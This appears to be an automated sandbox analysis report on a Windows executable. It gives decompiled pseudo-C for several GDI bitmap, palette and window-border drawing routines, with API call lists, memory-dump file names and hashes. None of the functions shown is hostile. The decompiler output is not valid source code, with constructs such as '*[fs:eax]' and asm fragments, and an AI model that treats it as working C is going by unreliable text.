_t126; _push(0x428f5a); if(_v20 != 0) { _t68 = DeleteDC(_v20); } if(_v12 != 0) { return ReleaseDC(0, _v12); } return _t68; } else { _v32 = SelectObject(_v20, _v8); if(_t130 != 0x1fffffff) { _v16 = E00426C14(CreateCompatibleDC(_v12)); _push(_t137); _push(0x428f0b); _push( *[fs:eax]); *[fs:eax] = _t140; if(_v96 == 0) { _v21 = 0; } else { _v21 = 1; _v92 = 0; _t117 = E00428690(_t117, _t133, _t133, 0, &_v116); } _v28 = SelectObject(_v16, _t117); if(_t133 != 0) { SelectPalette(_v16, _t133, 0); RealizePalette(_v16); SelectPalette(_v20, _t133, 0); RealizePalette(_v20); } _t82 = SetBkColor(_v16, _t130); BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020); SetBkColor(_v16, _t82); if(_v28 != 0) { SelectObject(_v16, _v28); } if(_v21 != 0) { DeleteObject(_t117); } _pop(_t127); *[fs:eax] = _t127; _push(0x428f12); return DeleteDC(_v16); } else { PatBlt(_v20, 0, 0, _v112, _v108, 0x42); if(_v32 != 0) { SelectObject(_v20, _v32); } goto L17; } } } } 0x00428d59 0x00428d5b 0x00428d61 0x00428d63 0x00428d65 0x00428d69 0x00428d6e 0x00428f63 0x00428d88 0x00428d8a 0x00428d91 0x00428d96 0x00428d9b 0x00428d9c 0x00428da1 0x00428da4 0x00428db3 0x00428dc4 0x00428dda 0x00428de1 0x00428f25 0x00428f25 0x00428f27 0x00428f2a 0x00428f2d 0x00428f36 0x00428f3c 0x00428f3c 0x00428f45 0x00000000 0x00428f4d 0x00428f52 0x00428de7 0x00428df4 0x00428dfd 0x00428e29 0x00428e2e 0x00428e2f 0x00428e34 0x00428e37 0x00428e3e 0x00428e5e 0x00428e40 0x00428e40 0x00428e46 0x00428e5a 0x00428e5a 0x00428e6c 0x00428e71 0x00428e7a 0x00428e83 0x00428e8f 0x00428e98 0x00428e98 0x00428ea2 0x00428ec6 0x00428ed0 0x00428ed9 0x00428ee3 0x00428ee3 0x00428eec 0x00428eef 0x00428eef 0x00428ef6 0x00428ef9 0x00428efc 0x00428f0a 0x00428dff 0x00428e11 0x00428f16 0x00428f20 0x00428f20 0x00000000 0x00428f16 0x00428dfd 0x00428de1

APIs

GetObjectA.GDI32(?,00000054,?), ref: 00428D7B GetDC.USER32(00000000), ref: 00428DA9 CreateCompatibleDC.GDI32(?), ref: 00428DBA CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00428DD5 SelectObject.GDI32(?,00000000), ref: 00428DEF PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00428E11 CreateCompatibleDC.GDI32(?), ref: 00428E1F SelectObject.GDI32(?), ref: 00428E67 SelectPalette.GDI32(?,?,00000000), ref: 00428E7A RealizePalette.GDI32(?), ref: 00428E83 SelectPalette.GDI32(?,?,00000000), ref: 00428E8F RealizePalette.GDI32(?), ref: 00428E98 SetBkColor.GDI32(?), ref: 00428EA2 BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00428EC6 SetBkColor.GDI32(?,00000000), ref: 00428ED0 SelectObject.GDI32(?,00000000), ref: 00428EE3 DeleteObject.GDI32 ref: 00428EEF DeleteDC.GDI32(?), ref: 00428F05 SelectObject.GDI32(?,00000000), ref: 00428F20 DeleteDC.GDI32(00000000), ref: 00428F3C ReleaseDC.USER32 ref: 00428F4D

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease String ID: API String ID: 332224125-0 Opcode ID: 043915a6f0d82eb22a204992b68ef0e525db3ffd50e10b4cd51da9086477a0f8 Instruction ID: 9b296df3905ff11574ab74c4800e5112e9892f6b575cab52e3ab6da5b25098aa Opcode Fuzzy Hash: 043915a6f0d82eb22a204992b68ef0e525db3ffd50e10b4cd51da9086477a0f8 Instruction Fuzzy Hash: 92513F71F00315AFDB10EBE9DC45FAEB7FCEB08704F51446AB214E7281CA7999508B68

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%

E00429A80(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, char* _a4) { intOrPtr _v8; intOrPtr* _v12; struct HDC__* _v16; struct HDC__* _v20; void* _v24; BITMAPINFOHEADER* _v28; intOrPtr _v32; intOrPtr _v36; signed int _v37; struct HBITMAP__* _v44; void* _v48; struct HPALETTE__* _v52; struct HPALETTE__* _v56; intOrPtr* _v60; intOrPtr* _v64; signed short _v66; signed short _v68; signed short _v70; signed short _v72; void* _v76; intOrPtr _v172; char _v174; intOrPtr _t151; signed int _t161; signed int _t165; intOrPtr _t169; signed int _t224; intOrPtr _t251; intOrPtr* _t255; intOrPtr _t261; signed int _t298; intOrPtr _t301; intOrPtr _t302; intOrPtr _t307; signed int _t328; void* _t330; void* _t331; signed int _t332; void* _t333; void* _t334; void* _t335; intOrPtr _t336; _t327 = __edi; _t334 = _t335; _t336 = _t335 + 0xffffff54; _t330 = __ecx; _v12 = __edx; _v8 = __eax; _v52 = 0; _v44 = 0; _v60 = 0; *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t333); _v37 = _v36 == 0xc; if(_v37 != 0) { _v36 = 0x28; } _v28 = E00402D0C(_v36 + 0x40c); _v64 = _v28; _push(_t334); _push(0x429fa1); _push( *[fs:edx]); *[fs:edx] = _t336; _push(_t334); _push(0x429f74); _push( *[fs:edx]); *[fs:edx] = _t336; if(_v37 == 0) { *((intOrPtr*)( *_v12 + 0xc))(); _t331 = _t330 - _v36; _t151 = *((intOrPtr*)(_v64 + 0x10)); if(_t151 != 3 && _t151 != 0) { _v60 = E004038F8(1); if(_a4 == 0) { E00403264( &_v174, 0xe); _v174 = 0x4d42; _v172 = _v36 + _t331; _a4 = &_v174; } *((intOrPtr*)( *_v60 + 0x10))(); *((intOrPtr*)( *_v60 + 0x10))(); *((intOrPtr*)( *_v60 + 0x10))(); E0041C924(_v60, *_v60, _v12, _t327, _t331, _t331, 0); *((intOrPtr*)( *_v60 + 0x14))(); _v12 = _v60; } } else { *((intOrPtr*)( *_v12 + 0xc))(); _t261 = _v64; E00403264(_t261, 0x28); _t251 = _t261; *(_t251 + 4) = _v72 & 0x0000ffff; *(_t251 + 8) = _v70 & 0x0000ffff; *((short*)(_t251 + 0xc)) = _v68 & 0x0000ffff; *((short*)(_t251 + 0xe)) = _v66 & 0x0000ffff; _t331 = _t330 - 0xc; } _t255 = _v64; *_t255 = _v36; _v32 = _v28 + _v36; if( *((short*)(_t255 + 0xc)) != 1) { E00426B00(); } if(_v36 == 0x28) { _t224 = *(_t255 + 0xe) & 0x0000ffff; if(_t224 == 0x10 || _t224 == 0x20) { if( *((intOrPtr*)(_t255 + 0x10)) == 3) { E0041C8B4(_v12, 0xc, _v32); _v32 = _v32 + 0xc; _t331 = _t331 - 0xc; } } } if( *(_t255 + 0x20) == 0) { *(_t255 + 0x20) = E00426D84( *(_t255 + 0xe) & 0x0000ffff); } _t328 = _v37 & 0x000000ff; _t79 = _t328 + 0x461ef0; // 0xc08b0304 E0041C8B4(_v12, *(_t255 + 0x20) * ( *_t79 & 0x000000ff), _v32); _t83 = _t328 + 0x461ef0; // 0xc08b0304 _t332 = _t331 - *(_t255 + 0x20) * ( *_t83 & 0x000000ff); if( *(_t255 + 0x14) == 0 || *((intOrPtr*)(_t255 + 0x10)) == 0) { _t298 = *(_t255 + 0xe) & 0x0000ffff; _t161 = E00426DA4( *((intOrPtr*)(_t255 + 4)), 0x20, _t298); asm("cdq"); *(_t255 + 0x14) = _t161 * (( *(_t255 + 8) ^ _t298) - _t298); } _t165 = *(_t255 + 0x14); if(_t332 > _t165) { _t332 = _t165; } if(_v37 != 0) { E00427050(_v32); } _v16 = E00426C14(GetDC(0)); _push(_t334); _push(0x429eef); _push( *[fs:edx]); *[fs:edx] = _t336; _t169 = *((intOrPtr*)(_v64 + 0x10)); if(_t169 == 0 || _t169 == 3) { if( *0x461c5c == 0) { _v44 = CreateDIBSection(_v16, _v28, 0, &_v24, 0, 0); if(_v44 == 0 || _v24 == 0) { if(GetLastError() != 0) { E0040D764(); } else { E00426B00(); } } _push(_t334); _push( *[fs:eax]); *[fs:eax] = _t336; E0041C8B4(_v12, _t332, _v24); _pop(_t301); *[fs:eax] = _t301; _t302 = 0x429ebe; *[fs:eax] = _t302; _push(0x429ef6); return ReleaseDC(0, _v16); } else { goto L28; } } else { L28: _v20 = 0; _v24 = E00402D0C(_t332); _push(_t334); _push(0x429e57); _push( *[fs:edx]); *[fs:edx] = _t336; E0041C8B4(_v12, _t332, _v24); _v20 = E00426C14(CreateCompatibleDC(_v16)); _v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1)); _v56 = 0; _t198 = *((intOrPtr*)(_v64 + 0x20)); if( *((intOrPtr*)(_v64 + 0x20)) > 0) { _v52 = E0042730C(0, _t198); _v56 = SelectPalette(_v20, _v52, 0); RealizePalette(_v20); } _push(_t334); _push(0x429e2b); _push( *[fs:edx]); *[fs:edx] = _t336; _v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0); if(_v44 == 0) { if(GetLastError() != 0) { E0040D764(); } else { E00426B00(); } } _pop(_t307); *[fs:eax] = _t307; _push(0x429e32); if(_v56 != 0) { SelectPalette(_v20, _v56, 0xffffffff); } return DeleteObject(SelectObject(_v20, _v48)); } } 0x00429a80 0x00429a81 0x00429a83 0x00429a8c 0x00429a8e 0x00429a91 0x00429a96 0x00429a9b 0x00429aa0 0x00429ab0 0x00429ab7 0x00429abf 0x00429ac1 0x00429ac1 0x00429ad8 0x00429ade 0x00429ae3 0x00429ae4 0x00429ae9 0x00429aec 0x00429af1 0x00429af2 0x00429af7 0x00429afa 0x00429b01 0x00429b60 0x00429b63 0x00429b69 0x00429b6f 0x00429b89 0x00429b90 0x00429b9f 0x00429ba4 0x00429bb2 0x00429bbe 0x00429bbe 0x00429bce 0x00429bde 0x00429bf2 0x00429c01 0x00429c13 0x00429c19 0x00429c19 0x00429b03 0x00429b13 0x00429b16 0x00429b22 0x00429b27 0x00429b2d 0x00429b34 0x00429b3b 0x00429b43 0x00429b47 0x00429b47 0x00429c1c 0x00429c22 0x00429c2a 0x00429c32 0x00429c34 0x00429c34 0x00429c3d 0x00429c3f 0x00429c47 0x00429c53 0x00429c60 0x00429c65 0x00429c69 0x00429c69 0x00429c53 0x00429c47 0x00429c70 0x00429c7b 0x00429c7b 0x00429c81 0x00429c85 0x00429c95 0x00429c9d 0x00429ca6 0x00429cac 0x00429cb4 0x00429cc0 0x00429cca 0x00429cd2 0x00429cd2 0x00429cd5 0x00429cda 0x00429cdc 0x00429cdc 0x00429ce2 0x00429ce7 0x00429ce7 0x00429cf8 0x00429cfd 0x00429cfe 0x00429d03 0x00429d06 0x00429d0c 0x00429d11 0x00429d1f 0x00429e75 0x00429e7c 0x00429e8b 0x00429e94 0x00429e8d 0x00429e8d 0x00429e8d 0x00429e8b 0x00429e9b 0x00429ea1 0x00429ea4 0x00429eaf 0x00429eb6 0x00429eb9 0x00429ed8 0x00429edb 0x00429ede 0x00429eee 0x00000000 0x00000000 0x00000000 0x00429d25 0x00429d25 0x00429d27 0x00429d31 0x00429d36 0x00429d37 0x00429d3c 0x00429d3f 0x00429d4a 0x00429d5d 0x00429d77 0x00429d7c 0x00429d82 0x00429d87 0x00429d95 0x00429da7 0x00429dae 0x00429dae 0x00429db5 0x00429db6 0x00429dbb 0x00429dbe 0x00429dd7 0x00429dde 0x00429de7 0x00429df0 0x00429de9 0x00429de9 0x00429de9 0x00429de7 0x00429df7 0x00429dfa 0x00429dfd 0x00429e06 0x00429e12 0x00429e12 0x00429e2a 0x00429e2a

APIs

GetDC.USER32(00000000), ref: 00429CEE CreateCompatibleDC.GDI32(00000001), ref: 00429D53 CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 00429D68 SelectObject.GDI32(?,00000000), ref: 00429D72 SelectPalette.GDI32(?,?,00000000), ref: 00429DA2 RealizePalette.GDI32(?), ref: 00429DAE CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00429DD2 GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00429E2B,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00429DE0 SelectPalette.GDI32(?,00000000,000000FF), ref: 00429E12 SelectObject.GDI32(?,?), ref: 00429E1F DeleteObject.GDI32(00000000), ref: 00429E25

Strings

( , xrefs: 00429C39 BM , xrefs: 00429BA4

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize String ID: ($BM API String ID: 2831685396-2980357723 Opcode ID: fc53f77d9d0130592b0a5017607ebe5ebc1f106cd622e18b61ea29ba8ac1efbb Instruction ID: 5f09fdd2a9c8d3bf44ec303fddff0b4bf25abaa9eceda00dd836569603864da6 Opcode Fuzzy Hash: fc53f77d9d0130592b0a5017607ebe5ebc1f106cd622e18b61ea29ba8ac1efbb Instruction Fuzzy Hash: FFD12970B002189FDF14EFA9D885BAEBBF5EF48304F55846AE904A7395D7389C40CB69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 62%

E0044323C(intOrPtr* __eax, intOrPtr __edx) { intOrPtr* _v8; intOrPtr _v12; struct HDC__* _v16; struct tagRECT _v32; struct tagRECT _v48; signed int _v60; signed int _v64; struct HRGN__* _t169; signed int _t204; intOrPtr* _t210; intOrPtr* _t213; intOrPtr _t220; signed int _t223; intOrPtr _t247; signed int _t248; void* _t263; void* _t266; void* _t268; intOrPtr _t269; _t266 = _t268; _t269 = _t268 + 0xffffffc4; _v12 = __edx; _v8 = __eax; if( *(_v8 + 0x195) != 0 || *(_v8 + 0x19c) > 0) { _v16 = GetWindowDC(E004423F8(_v8)); _push(_t266); _push(0x4434ef); _push( *[fs:ecx]); *[fs:ecx] = _t269; GetClientRect(E004423F8(_v8), &_v32); GetWindowRect(E004423F8(_v8), &_v48); MapWindowPoints(0, E004423F8(_v8), &_v48, "true"); OffsetRect( &_v32, ~(_v48.left), ~(_v48.top)); ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); InflateRect( &_v32, *(_v8 + 0x19c), *(_v8 + 0x19c)); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t223 = GetWindowLongA(E004423F8(_v8), 0xfffffff0); if((_t223 & 0x00200000) != 0) { _t213 = *0x462c28; // 0x466310 _v48.right = _v48.right + *((intOrPtr*)( *_t213))(0x14); } if((_t223 & 0x00100000) != 0) { _t210 = *0x462c28; // 0x466310 _v48.bottom = _v48.bottom + *((intOrPtr*)( *_t210))(0x15); } if( *(_v8 + 0x195) != 0) { _t263 = 0; _t248 = *(_v8 + 0x193) & 0x000000ff; if(_t248 != 0) { _t263 = 0 + *((intOrPtr*)(_v8 + 0x198)); } _t204 = *(_v8 + 0x194) & 0x000000ff; if(_t204 != 0) { _t263 = _t263 + *((intOrPtr*)(_v8 + 0x198)); } if(( *(_v8 + 0x192) & 0x00000001) != 0) { _v48.left = _v48.left - _t263; } if(( *(_v8 + 0x192) & 0x00000002) != 0) { _v48.top = _v48.top - _t263; } if(( *(_v8 + 0x192) & 0x00000004) != 0) { _v48.right = _v48.right + _t263; } if(( *(_v8 + 0x192) & 0x00000008) != 0) { _v48.bottom = _v48.bottom + _t263; } DrawEdge(_v16, &_v48, *(0x46262c + (_t248 & 0x0000007f) * 4) | *(0x46263c + (_t204 & 0x0000007f) * 4), *(_v8 + 0x192) & 0x000000ff | *(0x46264c + ( *(_v8 + 0x195) & 0x000000ff) * 4) | *(0x46265c + ( *(_v8 + 0x1d9) & 0x000000ff) * 4) | 0x00002000); } IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t169 = *(_v12 + 4); if(_t169 != 1) { GetRgnBox(_t169, &_v32); MapWindowPoints(0, E004423F8(_v8), &_v32, "true"); IntersectRect( &_v48, &_v48, &_v32); OffsetRect( &_v48, ~_v64, ~_v60); } else { OffsetRect( &_v48, ~_v48, ~(_v48.top)); } FillRect(_v16, &_v48, E004261BC( *((intOrPtr*)(_v8 + 0x1a4)))); _pop(_t247); *[fs:eax] = _t247; _push(0x4434f6); return ReleaseDC(E004423F8(_v8), _v16); } else { *((intOrPtr*)( *_v8 - 0x10))(); _t220 = E0042DC7C(E0042DB74()); if(_t220 != 0) { _t220 = _v8; if(( *(_t220 + 0x52) & 0x00000002) != 0) { _t220 = E0042E248(E0042DB74(), 0, _v8); } } return _t220; } } 0x0044323d 0x0044323f 0x00443245 0x00443248 0x00443255 0x00443275 0x0044327a 0x0044327b 0x00443280 0x00443283 0x00443293 0x004432a5 0x004432bb 0x004432d0 0x004432e9 0x004432f4 0x004432f5 0x004432f6 0x004432f7 0x00443307 0x00443312 0x00443313 0x00443314 0x00443315 0x00443326 0x0044332e 0x00443332 0x0044333b 0x0044333b 0x00443344 0x00443348 0x00443351 0x00443351 0x0044335e 0x00443364 0x00443369 0x00443372 0x00443377 0x00443377 0x00443380 0x00443389 0x0044338e 0x0044338e 0x0044339e 0x004433a0 0x004433a0 0x004433ad 0x004433af 0x004433af 0x004433bc 0x004433be 0x004433be 0x004433cb 0x004433cd 0x004433cd 0x00443420 0x00443420 0x00443439 0x00443444 0x00443445 0x00443446 0x00443447 0x0044344b 0x00443451 0x00443472 0x00443488 0x00443499 0x004434ae 0x00443453 0x00443463 0x00443463 0x004434ca 0x004434d1 0x004434d4 0x004434d7 0x004434ee 0x004434f6 0x004434fe 0x00443506 0x0044350d 0x0044350f 0x00443516 0x00443522 0x00443522 0x00443516 0x0044352d 0x0044352d

APIs

GetWindowDC.USER32(00000000), ref: 00443270 GetClientRect.USER32 ref: 00443293 GetWindowRect.USER32 ref: 004432A5 MapWindowPoints.USER32 ref: 004432BB OffsetRect.USER32(?,?,?), ref: 004432D0 ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?), ref: 004432E9 InflateRect.USER32(?,00000000,00000000), ref: 00443307 GetWindowLongA.USER32 ref: 00443321 DrawEdge.USER32(?,?,?,00000008), ref: 00443420 IntersectClipRect.GDI32(?,?,?,?,?), ref: 00443439 OffsetRect.USER32(?,?,?), ref: 00443463 GetRgnBox.GDI32(?,?), ref: 00443472 MapWindowPoints.USER32 ref: 00443488 IntersectRect.USER32 ref: 00443499 OffsetRect.USER32(?,?,?), ref: 004434AE FillRect.USER32 ref: 004434CA ReleaseDC.USER32 ref: 004434E9

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease String ID: API String ID: 2490777911-0 Opcode ID: 6e3754b0df94dcb7bcdb5046d3db607f40a88203350a562e934c88a292f62008 Instruction ID: 7b120e4924686e31309899fdc82388f4ae83de811d5366100fd5c7bdcafe2d3f Opcode Fuzzy Hash: 6e3754b0df94dcb7bcdb5046d3db607f40a88203350a562e934c88a292f62008 Instruction Fuzzy Hash: 5EA12E71E00148AFDB01DFA9C986EDEB7F9AF09704F1440A6F915F7291C679AE01CB64

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E00429268(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) { intOrPtr _v8; struct HPALETTE__* _v12; char _v13; struct tagPOINT _v21; struct HDC__* _v28; void* _v32; struct HPALETTE__* _t78; signed int _t84; signed int _t85; signed int _t86; char _t87; void* _t140; intOrPtr* _t170; intOrPtr _t184; intOrPtr _t186; int* _t190; intOrPtr _t192; void* _t194; void* _t195; intOrPtr _t196; _t171 = __ecx; _t194 = _t195; _t196 = _t195 + 0xffffffe4; _t190 = __ecx; _v8 = __edx; _t170 = __eax; _t192 = *((intOrPtr*)(__eax + 0x28)); E004268F8(_v8, __ecx, *0x4294b4 & 0x000000ff, __ecx); E004297F8(_t170); _v12 = 0; _v13 = 0; _t78 = *(_t192 + 0x10); if(_t78 != 0) { _v12 = SelectPalette( *(_v8 + 4), _t78, 0xffffffff); RealizePalette( *(_v8 + 4)); _v13 = 1; } _push(GetDeviceCaps( *(_v8 + 4), 0xc)); _t84 = GetDeviceCaps( *(_v8 + 4), 0xe); _pop(_t85); _t86 = _t85 * _t84; if(_t86 > 8) { L4: _t87 = 0; } else { _t171 = *(_t192 + 0x28) & 0x0000ffff; if(_t86 < ( *(_t192 + 0x2a) & 0x0000ffff) * ( *(_t192 + 0x28) & 0x0000ffff)) { _t87 = 1; } else { goto L4; } } if(_t87 == 0) { if(E004295F4(_t170) == 0) { SetStretchBltMode(E0042681C(_v8), 3); } } else { GetBrushOrgEx( *(_v8 + 4), &_v21); SetStretchBltMode( *(_v8 + 4), 4); SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y, &_v21); } _push(_t194); _push(0x4294a6); _push( *[fs:eax]); *[fs:eax] = _t196; if( *((intOrPtr*)( *_t170 + 0x28))() != 0) { E00429798(_t170, _t171); } E004268F8(E00429538(_t170), _t171, *0x4294b4 & 0x000000ff, _t190); if( *((intOrPtr*)( *_t170 + 0x28))() == 0) { StretchBlt( *(_v8 + 4), *_t190, _t190[1], _t190[2] - *_t190, _t190[3] - _t190[1], *(E00429538(_t170) + 4), 0, 0, *(_t192 + 0x1c), *(_t192 + 0x20), *(_v8 + 0x20)); _pop(_t184); *[fs:eax] = _t184; _push(0x4294ad); if(_v13 != 0) { return SelectPalette( *(_v8 + 4), _v12, 0xffffffff); } return 0; } else { _v32 = 0; _v28 = 0; _push(_t194); _push(0x42943b); _push( *[fs:eax]); *[fs:eax] = _t196; _v28 = E00426C14(CreateCompatibleDC(0)); _v32 = SelectObject(_v28, *(_t192 + 0xc)); E00426DC4( *(_v8 + 4), _t170, _t190[1], *_t190, _t190, _t192, 0, 0, _v28, *(_t192 + 0x20), *(_t192 + 0x1c), 0, 0, *(E00429538(_t170) + 4), _t190[3] - _t190[1], _t190[2] - *_t190); _t140 = 0; _pop(_t186); *[fs:eax] = _t186; _push(0x429480); if(_v32 != 0) { _t140 = SelectObject(_v28, _v32); } if(_v28 != 0) { return DeleteDC(_v28); } return _t140; } } 0x00429268 0x00429269 0x0042926b 0x00429271 0x00429273 0x00429276 0x00429278 0x00429285 0x0042928c 0x00429293 0x00429296 0x0042929a 0x0042929f 0x004292b0 0x004292ba 0x004292bf 0x004292bf 0x004292d1 0x004292db 0x004292e2 0x004292e3 0x004292e8 0x004292f9 0x004292f9 0x004292ea 0x004292ee 0x004292f7 0x004292fd 0x00000000 0x00000000 0x00000000 0x004292f7 0x00429301 0x00429344 0x00429351 0x00429351 0x00429303 0x0042930e 0x0042931c 0x00429334 0x00429334 0x00429358 0x00429359 0x0042935e 0x00429361 0x0042936d 0x00429371 0x00429371 0x00429384 0x00429392 0x0042947b 0x00429482 0x00429485 0x00429488 0x00429491 0x00000000 0x004294a0 0x004294a5 0x00429398 0x0042939a 0x0042939f 0x004293a4 0x004293a5 0x004293aa 0x004293ad 0x004293bc 0x004293cc 0x00429406 0x0042940b 0x0042940d 0x00429410 0x00429413 0x0042941c 0x00429426 0x00429426 0x0042942f 0x00000000 0x00429435 0x0042943a 0x0042943a

APIs

Part of subcall function 004297F8: GetDC.USER32(00000000), ref: 0042984E Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863 Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D Part of subcall function 004297F8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891 Part of subcall function 004297F8: ReleaseDC.USER32 ref: 0042989C SelectPalette.GDI32(?,?,000000FF), ref: 004292AB RealizePalette.GDI32(?), ref: 004292BA GetDeviceCaps.GDI32(?,0000000C), ref: 004292CC GetDeviceCaps.GDI32(?,0000000E), ref: 004292DB GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042930E SetStretchBltMode.GDI32(?,00000004), ref: 0042931C SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00429334 SetStretchBltMode.GDI32(00000000,00000003), ref: 00429351 CreateCompatibleDC.GDI32(00000000), ref: 004293B2 SelectObject.GDI32(?,?), ref: 004293C7 SelectObject.GDI32(?,00000000), ref: 00429426 DeleteDC.GDI32(00000000), ref: 00429435

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease String ID: API String ID: 2414602066-0 Opcode ID: e3fba3740f0dcb9a9556d00d241c3eff92958012f974742950326578c5eef44f Instruction ID: d82af69fe42d34c23c978d2582e61c5ab2b2549b478e9a14ed03732d0c903b0f Opcode Fuzzy Hash: e3fba3740f0dcb9a9556d00d241c3eff92958012f974742950326578c5eef44f Instruction Fuzzy Hash: 66714975B04214AFDB10EFA9D985F5AB7F8EF08304F51856AB509E7281D638ED018B68

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 64%

E00426C24(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) { void* _v8; int _v12; int _v16; struct HBITMAP__* _v20; struct HDC__* _v24; struct HDC__* _v28; struct HDC__* _v32; int _v48; int _v52; void _v56; void* _t78; intOrPtr _t85; intOrPtr _t86; void* _t91; void* _t93; void* _t94; intOrPtr _t95; _t93 = _t94; _t95 = _t94 + 0xffffffcc; asm("movsd"); asm("movsd"); _t77 = __ecx; _v8 = __eax; _v28 = CreateCompatibleDC(0); _v32 = CreateCompatibleDC(0); _push(_t93); _push(0x426d72); _push( *[fs:eax]); *[fs:eax] = _t95; GetObjectA(_v8, 0x18, &_v56); if(__ecx == 0) { _v24 = GetDC(0); if(_v24 == 0) { E00426B6C(_t77); } _push(_t93); _push(0x426ce1); _push( *[fs:eax]); *[fs:eax] = _t95; _v20 = CreateCompatibleBitmap(_v24, _v16, _v12); if(_v20 == 0) { E00426B6C(_t77); } _pop(_t85); *[fs:eax] = _t85; _push(0x426ce8); return ReleaseDC(0, _v24); } else { _v20 = CreateBitmap(_v16, _v12, 1, 1, 0); if(_v20 != 0) { _t78 = SelectObject(_v28, _v8); _t91 = SelectObject(_v32, _v20); StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020); if(_t78 != 0) { SelectObject(_v28, _t78); } if(_t91 != 0) { SelectObject(_v32, _t91); } } _pop(_t86); *[fs:eax] = _t86; _push(0x426d79); DeleteDC(_v28); return DeleteDC(_v32); } } 0x00426c25 0x00426c27 0x00426c32 0x00426c33 0x00426c34 0x00426c36 0x00426c40 0x00426c4a 0x00426c4f 0x00426c50 0x00426c55 0x00426c58 0x00426c65 0x00426c6c 0x00426c8d 0x00426c94 0x00426c96 0x00426c96 0x00426c9d 0x00426c9e 0x00426ca3 0x00426ca6 0x00426cba 0x00426cc1 0x00426cc3 0x00426cc3 0x00426cca 0x00426ccd 0x00426cd0 0x00426ce0 0x00426c6e 0x00426c81 0x00426cec 0x00426cfb 0x00426d0a 0x00426d31 0x00426d38 0x00426d3f 0x00426d3f 0x00426d46 0x00426d4d 0x00426d4d 0x00426d46 0x00426d54 0x00426d57 0x00426d5a 0x00426d63 0x00426d71 0x00426d71

APIs

